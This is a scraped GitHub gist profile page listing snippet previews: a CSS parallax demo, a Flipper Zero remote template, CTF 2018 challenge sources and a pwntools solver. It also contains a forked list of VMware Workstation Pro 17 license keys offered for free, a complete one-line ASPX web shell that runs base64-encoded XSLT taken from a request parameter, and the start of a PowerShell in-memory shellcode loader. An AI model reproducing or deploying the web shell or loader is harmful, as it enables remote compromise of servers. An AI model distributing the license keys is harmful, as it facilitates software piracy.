Skip to content

Instantly share code, notes, and snippets.

View tehmasta's full-sized avatar
💣
no talent, just dreams

Robert tehmasta

💣
no talent, just dreams
View GitHub Profile
@tehmasta
tehmasta / full-parallax-for-ios-css-only.markdown
Created December 27, 2022 18:03
Full Parallax for iOS CSS only

Full Parallax for iOS CSS only

This is a demos of a web-page which recreates the popular parallax look in a way that is compatible with iOS. The images are given position:sticky; and are hidden behind the solid sections as they scroll. The images then stick to the top of the page and are revealed as the user continues to scroll. The main limitation is that the solid panels need to be a full screen height to hide the next image.

A Pen by tehmasta on CodePen.

License.

@tehmasta
tehmasta / unirf_template.txt
Created December 27, 2022 18:22
FlipperZero “unirf” ‘Favorite’ template.. ?*
# to be placed within your SD;
## ie: "any/unirf/..;" "ext/unirf/..;" etc.
UP: /ext/subghz/whatever-300.sub
DOWN: /ext/subghz/whatever-430.sub
LEFT:
RIGHT:
OK: /
ULABEL: 300mhz
DLABEL: 430mhz
@tehmasta
tehmasta / vmwk17key.txt
Created January 5, 2023 18:54 — forked from PurpleVibe32/vmwk17key.txt
Free VMware Workstation Pro 17 full license keys
Install VMWare Workstation PRO 17 (Read it right. PRO!)
*If you have a problem comment and people will try to help you!
*No virus
*No spam just license key
*Based on william's gist
MC60H-DWHD5-H80U9-6V85M-8280D < worked for me!
4A4RR-813DK-M81A9-4U35H-06KND
NZ4RR-FTK5H-H81C1-Q30QH-1V2LA
JU090-6039P-08409-8J0QH-2YR7F
<!DOCTYPE html>
<html>
<head>
<title>Please Subscribe</title>
</head>
<body>
<script>
// File name and contents
@tehmasta
tehmasta / notegen.py
Created January 6, 2023 18:25 — forked from LapisOnTheMoon/notegen.py
Generates a README.md with TryHackMe tasks and questions automatically.
#!/usr/bin/python3
import requests
import sys
from datetime import datetime
import re
tag_re = re.compile(r'(<!--.*?-->|<[^>]*>)')
name = "" # change this
code = ""
def get_room_code(s):
<%@ Page Language="C#" %><% var c=new System.Xml.XmlDocument();c.LoadXml(@"<root>1</root>");var b=new System.Xml.XmlDocument();b.LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request["REDACTED"])));var xct=new System.Xml.Xsl.XslCompiledTransform();xct.Load(b,System.Xml.Xsl.XsltSettings.TrustedXslt,new System.Xml.XmlUrlResolver());xct.Transform(c,null,new System.IO.MemoryStream()); %>
function sOH {
Param ($o73, $icO)
$zJ3 = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods')
return $zJ3.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String])).Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($zJ3.GetMethod('GetModuleHandle')).Invoke($null, @($o73)))), $icO))
}
@tehmasta
tehmasta / source.py
Created January 6, 2023 18:40 — forked from JohnHammond/source.py
Codefest CTF 2018 "Ghost Protocol" Source Code
##########################################################
##########################################################
####### ###### # #####
# # # # #
# ### # #####
# # # # #
##### # # #####
##########################################################
##########################################################
@tehmasta
tehmasta / source.py
Created January 6, 2023 18:40 — forked from JohnHammond/source.py
Codefest CTF 2018 "Access Denied?" Challenge Source
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import user_functions
user = raw_input("Enter your name: ")
if not user_functions.exists(user):
# generate a code
@tehmasta
tehmasta / get_flag.py
Created January 6, 2023 18:41 — forked from JohnHammond/get_flag.py
Codefest CTF 2018 "Access Denied?" get_flag Script
#!/usr/bin/env python
import random
from pwn import *
context.log_level = 'critical'
# nc 34.216.132.109 9094
host = '34.216.132.109'